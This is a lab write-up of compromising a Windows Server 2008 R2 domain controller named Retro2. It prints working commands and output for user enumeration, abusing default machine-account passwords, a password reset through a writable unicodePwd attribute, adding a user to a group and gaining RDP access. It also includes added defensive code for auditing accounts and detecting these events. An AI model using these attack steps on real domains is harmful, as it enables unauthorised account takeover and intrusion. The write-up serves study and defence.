Retro2 is an easy Windows machine that starts off with guest authentication enabled, which lets us look at the shares and find a Microsoft Access database file. After finding the user and password inside it we are able to obtain a BloodHound dump. This shows a relatively simple path with some twists: we find a couple of pre-Windows 2000 computer accounts and change the password for one of them. That lets us change/reset the password for the computer ADMWS01$, which has a particular attribute writable that allows the reset. Once we’ve done this we are able to add our user to the Services group, allowing RDP access. Upon getting a session we find that, with this version of Windows Server 2008, we are able to control the full path of a Windows registry value, which allows us to escalate to NT AUTHORITY\SYSTEM.

Initial Nmap

PORT      STATE SERVICE      VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-08 15:45:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: BLN01
| NetBIOS computer name: BLN01\x00
| Domain name: retro2.vl
| Forest name: retro2.vl
| FQDN: BLN01.retro2.vl
|_ System time: 2024-11-08T16:46:17+01:00
| smb2-time:
| date: 2024-11-08T15:46:14
|_ start_date: 2024-11-08T15:44:30
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: mean: 47m06s, deviation: 34m35s, median: 1h07m04s

NSE: Script Post-scanning.
Initiating NSE at 08:39
Completed NSE at 08:39, 0.00s elapsed
Initiating NSE at 08:39
Completed NSE at 08:39, 0.00s elapsed
Initiating NSE at 08:39
Completed NSE at 08:39, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.68 seconds
Raw packets sent: 1990 (87.536KB) | Rcvd: 17 (732B)

SMB

Found lots of users via RID brute forcing over the guest session.

$ nxc smb retro2.vl -u jay -p '' --rid-brute  | tr -s " " | awk -F'\' '{print $2}' | awk '{print $1}' > users.lst

<SNIP>
Julie.Martin
Clare.Smith
Laura.Davies
Rhys.Richards
Leah.Robinson
Michelle.Bird
<SNIP>

Found MS Access Database.

This file was password protected, so converting it with office2john and cracking the hash got us in, and inside we found creds.


strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "<SNIP>"

BloodHound

Now we can get a BloodHound dump and look at our attack path. From there the path is relatively simple. We can use FS01$ or FS02$. I’m using FS01$.

Seeing as pre-Windows 2000 computer accounts use their lowercase hostname as the password, we can check whether we get an error that indicates a password change is needed rather than a plain logon failure.

$ nxc smb retro2.vl -u 'FS01$' -p fs01                                                                                         
SMB 10.10.106.109 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.10.106.109 445 BLN01 [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

Because we got STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT rather than STATUS_LOGON_FAILURE, the credentials are valid, so the password for this machine account can be changed. We can use bloodyAD to set its password.

$ ./bloodyAD.py -v DEBUG --dc-ip 10.10.106.109 --host retro2.vl -d retro2.vl -u 'ldapreader' -p '<SNIP>' set password 'FS01$' 'Password123!' --oldpass fs01 
[*] Trying to connect to retro2.vl...
[+] Connection successful
[+] Password changed successfully!
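From the defensive side, the accounts that make this step possible are computer objects that were pre-created but never joined, so their password never left the default. The following is an added example (my own code, not from the write-up or from any of the tools used in it) that audits computer-account attributes for those signs. The records are constructed to mirror the names above, and the heuristics (PASSWD_NOTREQD set, zero logons, pwdLastSet equal to whenCreated, password older than the default 30-day rotation) are this example's assumptions about what a pre-created account looks like.

```python
"""Audit computer accounts for signs of pre-created ("pre-Windows 2000") objects.

Added example, not from the original write-up. It runs over constructed
records shaped like an LDAP dump of (objectClass=computer); in a real audit
you would feed it the attributes read from the directory with a read-only
account. Thresholds and heuristics are this example's own assumptions.
"""
from datetime import datetime, timedelta, timezone

# userAccountControl bits (real values from the ADS_USER_FLAG enumeration)
UF_PASSWD_NOTREQD = 0x0020
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000

# Domain members rotate their machine password every 30 days by default, so an
# older pwdLastSet on a trust account is worth a look (assumption: the audited
# domain does not override that policy).
MAX_MACHINE_PASSWORD_AGE = timedelta(days=30)

# Constructed sample records; the names mirror the write-up, the values are made up.
# 4128 is WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD, 532480 is a domain controller
# (SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION), 4096 is a plain workstation.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "FS01$", "userAccountControl": 4128, "logonCount": 0,
     "pwdLastSet": "2020-03-01T10:00:00Z", "whenCreated": "2020-03-01T10:00:00Z"},
    {"sAMAccountName": "BLN01$", "userAccountControl": 532480, "logonCount": 812,
     "pwdLastSet": "2024-10-20T08:12:00Z", "whenCreated": "2019-01-15T09:00:00Z"},
    {"sAMAccountName": "ADMWS01$", "userAccountControl": 4096, "logonCount": 0,
     "pwdLastSet": "2021-06-01T12:00:00Z", "whenCreated": "2021-06-01T12:00:00Z"},
]


def parse_ts(value):
    """Parse the ISO-8601 UTC timestamps used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def audit_computer(rec, now):
    """Return the findings for one computer account (empty list if nothing stands out)."""
    findings = []
    uac = rec["userAccountControl"]
    if not uac & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT):
        return findings                       # not a machine trust account
    if uac & UF_PASSWD_NOTREQD:
        # Heuristic: seen on accounts pre-created through the ADUC wizard.
        findings.append("PASSWD_NOTREQD is set")
    if rec["logonCount"] == 0:
        findings.append("account has never logged on")
    created, pwd_set = parse_ts(rec["whenCreated"]), parse_ts(rec["pwdLastSet"])
    if pwd_set == created:
        findings.append("password unchanged since the object was created")
    if now - pwd_set > MAX_MACHINE_PASSWORD_AGE:
        findings.append(f"machine password is {(now - pwd_set).days} days old")
    return findings


def audit_all(records, now):
    """now is an ISO-8601 UTC timestamp string; returns {sAMAccountName: findings}."""
    ref = parse_ts(now)
    results = {}
    for rec in records:
        findings = audit_computer(rec, ref)
        if findings:
            results[rec["sAMAccountName"]] = findings
    return results


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_COMPUTERS, "2024-11-08T00:00:00Z").items():
        print(name)
        for finding in findings:
            print("   -", finding)
```

Accounts that come back with several findings are the ones to either join properly, reset with a random password, or delete; the domain controller in the sample produces no findings because it logs on and rotates its password on schedule.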

There are three well-known ways to abuse the GenericWrite permission:

  • Shadow Credentials (applicable with Windows Server 2016 and later)
  • Targeted Kerberoasting (effective if the target’s password is weak and crackable)
  • Resource-Based Constrained Delegation

None of which will work on this 2008 machine. 😒

Yet on Windows Server 2008 there is an attribute (unicodePwd) which, if writable, lets us perform a password reset of the ADMWS01$ computer account. This article explains some context.

$ ./bloodyAD.py -v DEBUG --dc-ip 10.10.102.10 --host retro2.vl -d retro2.vl -u 'FS01$' -p 'Password123!' get writable --otype COMPUTER --detail                                                                                    
[*] Trying to connect to retro2.vl...
[+] Connection successful
distinguishedName: CN=ADMWS01,CN=Computers,DC=retro2,DC=vl
serviceInstance: CREATE_CHILD
applicationVersion: CREATE_CHILD
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
rpcProfile: CREATE_CHILD
rpcProfileElement: CREATE_CHILD
msieee80211-Policy: CREATE_CHILD
serviceAdministrationPoint: CREATE_CHILD
<SNIP>
ntPwdHistory: WRITE
otherLoginWorkstations: WRITE
unicodePwd: WRITE <-----
userWorkstations: WRITE
maxStorage: WRITE
<SNIP>
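Listings like the one above are long, and the one attribute that matters is easy to miss among the CREATE_CHILD noise. Here is an added example (my own code, not bloodyAD's or the write-up's) that parses text in the same shape, a distinguishedName line followed by "attribute: RIGHT" lines, and reports the attributes whose WRITE right hands over control of the object, so an audit can prioritise removing those ACEs. The sample listing, the example.local names and the attribute-to-technique mapping are this example's own assumptions; the mapping just restates the three techniques listed above plus the password reset used here.

```python
"""Triage 'writable attribute' listings for high-risk write rights.

Added example, not part of the original write-up or of bloodyAD. It parses a
constructed listing in the shape shown in the write-up and flags attributes
whose WRITE right amounts to control of the object.
"""
import re

# Attributes whose WRITE right on a user/computer object is equivalent to
# taking the object over. The technique names are this example's summary.
HIGH_RISK_ATTRIBUTES = {
    "unicodePwd": "password reset",
    "msDS-KeyCredentialLink": "shadow credentials (needs a 2016+ DC)",
    "servicePrincipalName": "targeted Kerberoasting",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "resource-based constrained delegation",
    "member": "group membership change",
}

# Constructed sample in the same layout as the listing above (example.local is made up).
SAMPLE_OUTPUT = """\
[*] Trying to connect to example.local...
[+] Connection successful
distinguishedName: CN=WS01,CN=Computers,DC=example,DC=local
serviceInstance: CREATE_CHILD
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
ntPwdHistory: WRITE
unicodePwd: WRITE <-----
userWorkstations: WRITE
<SNIP>
distinguishedName: CN=SRV02,CN=Computers,DC=example,DC=local
description: WRITE
distinguishedName: CN=Helpdesk Staff,CN=Users,DC=example,DC=local
member: WRITE
"""

# "attributeName: value"; attribute names may contain hyphens, values may contain spaces.
LINE = re.compile(r"^([\w\-]+):\s*(.+?)\s*$")


def parse_writable(text):
    """Return {distinguishedName: {attribute: right}} from a listing."""
    objects, current = {}, None
    for line in text.splitlines():
        match = LINE.match(line)
        if not match:
            continue                          # status lines, <SNIP>, blanks
        attr, value = match.groups()
        if attr == "distinguishedName":
            current = value                   # DNs may contain spaces; keep whole value
            objects[current] = {}
        elif current is not None:
            objects[current][attr] = value.split()[0]   # drop trailing markers like "<-----"
    return objects


def high_risk_findings(objects):
    """List (dn, attribute, technique) for every high-risk attribute with WRITE access."""
    findings = []
    for dn, attrs in objects.items():
        for attr, right in attrs.items():
            if attr in HIGH_RISK_ATTRIBUTES and right.upper() == "WRITE":
                findings.append((dn, attr, HIGH_RISK_ATTRIBUTES[attr]))
    return findings


if __name__ == "__main__":
    for dn, attr, technique in high_risk_findings(parse_writable(SAMPLE_OUTPUT)):
        print(f"{dn}: WRITE on {attr} -> {technique}")
```

Run against a real listing, every line it prints is an ACE worth tracing back to the principal that holds it and removing unless there is a documented reason for it.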

With the attribute writable, we can change/reset the password for ADMWS01$. I found it difficult to do with bloodyAD, but changepasswd.py from Impacket got the job done.

$ changepasswd.py -dc-ip 10.10.102.10 -altuser 'FS01$' -altpass 'Password123!' -newpass 'Password123!' -p rpc-samr 'retro2.vl/ADMWS01$@retro2.vl' -reset -admin
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Setting the password of retro2.vl\ADMWS01$ as retro2.vl\FS01$
[*] Connecting to DCE/RPC as retro2.vl\FS01$
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

Once we’ve done this, we can add ldapreader to the Services group, which will allow that user to RDP to the machine.

$ ./bloodyAD.py -v DEBUG --dc-ip 10.10.102.10 --host retro2.vl -d retro2.vl -u 'ADMWS01$' -p 'Password123!' add groupMember 'Services' 'ldapreader'
[*] Trying to connect to retro2.vl...
[+] Connection successful
[+] ldapreader added to Services
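Both of the last two steps leave clear traces in the Security log of the domain controller: the change of FS01$'s own password with the old password is a 4723, the reset of ADMWS01$ by FS01$ is a 4724 (followed by a 4742 "computer account changed"), and the group edit by ADMWS01$ is a 4728. The following is an added example (my own detection logic, not from the write-up) that runs two rules over constructed event records shaped like the EventData of those events: a computer account's password being changed or reset by anyone other than that computer, and a computer account editing group membership. The field names follow the real events; the records and the rules themselves are this example's assumptions.

```python
"""Flag computer-account password changes and group edits done by unusual principals.

Added example, not from the original write-up. The records are constructed to
mirror the chain described above; SubjectUserName / TargetUserName / MemberName
are the EventData field names of Windows Security events 4723, 4724, 4742 and
4728, but the rule thresholds are this example's own heuristics.
"""

# Constructed sample events (names mirror the write-up, nothing here is real log data).
SAMPLE_EVENTS = [
    # Normal: a domain-joined host rotating its own machine password.
    {"EventID": 4723, "SubjectUserName": "BLN01$", "TargetUserName": "BLN01$"},
    # Suspicious: one computer account resetting another computer account's password.
    {"EventID": 4724, "SubjectUserName": "FS01$", "TargetUserName": "ADMWS01$"},
    {"EventID": 4742, "SubjectUserName": "FS01$", "TargetUserName": "ADMWS01$"},
    # Suspicious: a computer account adding a user to a group.
    {"EventID": 4728, "SubjectUserName": "ADMWS01$", "TargetUserName": "Services",
     "MemberName": "CN=ldapreader,OU=staff,DC=retro2,DC=vl"},
    # Normal: a helpdesk user adding someone to a group.
    {"EventID": 4728, "SubjectUserName": "helpdesk.admin", "TargetUserName": "Printer Users",
     "MemberName": "CN=Julie.Martin,OU=staff,DC=retro2,DC=vl"},
]

# 4723: password change (old password known); 4724: password reset (no old password).
PASSWORD_EVENTS = {4723: "change", 4724: "reset"}
# Member added to a security-enabled global / local / universal group.
GROUP_ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}


def is_computer_account(name):
    """Machine accounts in Windows logs end with '$'."""
    return name.endswith("$")


def evaluate(event):
    """Return an alert string, or None when the event looks benign under these rules."""
    eid = event["EventID"]
    subject, target = event["SubjectUserName"], event["TargetUserName"]

    # Rule 1: a computer's password is changed/reset by someone other than the computer itself.
    if eid in PASSWORD_EVENTS and is_computer_account(target) and subject != target:
        return f"{PASSWORD_EVENTS[eid]} of computer account {target} by {subject}"

    # Rule 1b: the matching 4742 shows which computer account did the modification.
    if eid == 4742 and is_computer_account(subject) and subject != target:
        return f"computer account {target} modified by another computer account {subject}"

    # Rule 2: computer accounts do not normally edit group membership.
    if eid in GROUP_ADD_EVENTS and is_computer_account(subject):
        return (f"computer account {subject} added {event.get('MemberName')} "
                f"to {GROUP_ADD_EVENTS[eid]} group {target}")
    return None


def run_rules(events):
    """Apply evaluate() to every event and return the alerts in log order."""
    return [alert for alert in map(evaluate, events) if alert]


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Rule 1 will also fire when an administrator resets a machine account through the ADUC console, which is rare enough in most environments to be worth a ticket; the benign self-rotation in the first sample event passes because subject and target are the same account.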

Session as ldapreader

We can get a session going via RDP.

$ xfreerdp /v:retro2.vl /u:ldapreader /p:<SNIP> /tls-seclevel:0 +clipboard /dynamic-resolution

I looked around and did some research about Windows Server 2008 R2, finding some articles, but then I came across something of a “no fix” by itm4n. It explains that using Get-WmiObject Win32_Perf to query the performance counters of the machine makes the WMI service load a specified DLL, which gets us NT AUTHORITY\SYSTEM.

PrivEsc

Once we have downloaded the repo and compiled it, we can transfer the binary over to the machine and execute it.